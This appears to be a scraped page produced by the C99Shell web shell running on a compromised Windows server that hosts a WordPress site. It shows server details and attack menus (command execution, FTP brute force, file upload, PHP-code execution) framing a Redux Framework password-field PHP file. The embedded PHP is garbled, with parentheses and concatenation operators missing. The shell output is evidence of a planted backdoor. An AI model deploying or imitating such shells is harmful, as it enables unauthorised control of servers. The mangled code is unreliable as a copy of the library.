!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\themes\patti\framework\ReduxFramework\ReduxCore\inc\fields\password\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     field_password.php (4.42 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

    
/**
     * Class ReduxFramework_password
     */

// Exit if accessed directly
    
if ( ! defined'ABSPATH' ) ) {
        exit;
    }

    if ( ! 
class_exists'ReduxFramework_password' ) ) {
        class 
ReduxFramework_password {

            
/**
             * Field Constructor.
             * Required - must call the parent constructor, then assign field and value to vars, and obviously call the render field function
             *
             * @since ReduxFramework 1.0.1
             */
            
function __construct$field = array(), $value ''$parent ) {
                
$this->parent $parent;
                
$this->field  $field;
                
$this->value  $value;
            }

            
/**
             * Field Render Function.
             * Takes the vars and outputs the HTML for the field in the settings
             *
             * @since ReduxFramework 1.0.1
             */
            
function render() {
                if ( ! empty( 
$this->field['username'] ) && $this->field['username'] === true ) {
                    
$this->_render_combined_field();
                } else {
                    
$this->_render_single_field();
                }
            }

            
/**
             * This will render a combined User/Password field
             *
             * @since ReduxFramework 3.0.9
             * @example
             *        <code>
             *        array(
             *        'id'          => 'smtp_account',
             *        'type'        => 'password',
             *        'username'    => true,
             *        'title'       => 'SMTP Account',
             *        'placeholder' => array('username' => 'Username')
             *        )
             *        </code>
             */
            
private function _render_combined_field() {

                
$defaults = array(
                    
'username'    => '',
                    
'password'    => '',
                    
'placeholder' => array(
                        
'password' => __'Password''redux-framework' ),
                        
'username' => __'Username''redux-framework' )
                    )
                );

                
$this->value wp_parse_args$this->value$defaults );

                if ( ! empty( 
$this->field['placeholder'] ) ) {
                    if ( 
is_array$this->field['placeholder'] ) ) {
                        if ( ! empty( 
$this->field['placeholder']['password'] ) ) {
                            
$this->value['placeholder']['password'] = $this->field['placeholder']['password'];
                        }
                        if ( ! empty( 
$this->field['placeholder']['username'] ) ) {
                            
$this->value['placeholder']['username'] = $this->field['placeholder']['username'];
                        }
                    } else {
                        
$this->value['placeholder']['password'] = $this->field['placeholder'];
                    }
                }

                
// Username field
                
echo '<input type="text" autocomplete="off" placeholder="' $this->value['placeholder']['username'] . '" id="' $this->field['id'] . '[username]" name="' $this->field['name'] . $this->field['name_suffix'] . '[username]' '" value="' esc_attr$this->value['username'] ) . '" class="' $this->field['class'] . '" />&nbsp;';

                
// Password field
                
echo '<input type="password" autocomplete="off" placeholder="' $this->value['placeholder']['password'] . '" id="' $this->field['id'] . '[password]" name="' $this->field['name'] . $this->field['name_suffix'] . '[password]' '" value="' esc_attr$this->value['password'] ) . '" class="' $this->field['class'] . '" />';
            }

            
/**
             * This will render a single Password field
             *
             * @since ReduxFramework 3.0.9
             * @example
             *        <code>
             *        array(
             *        'id'    => 'smtp_password',
             *        'type'  => 'password',
             *        'title' => 'SMTP Password'
             *        )
             *        </code>
             */
            
private function _render_single_field() {
                echo 
'<input type="password" id="' $this->field['id'] . '" name="' $this->field['name'] . $this->field['name_suffix'] . '" value="' esc_attr$this->value ) . '" class="' $this->field['class'] . '" />';
            }
        }
    }

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--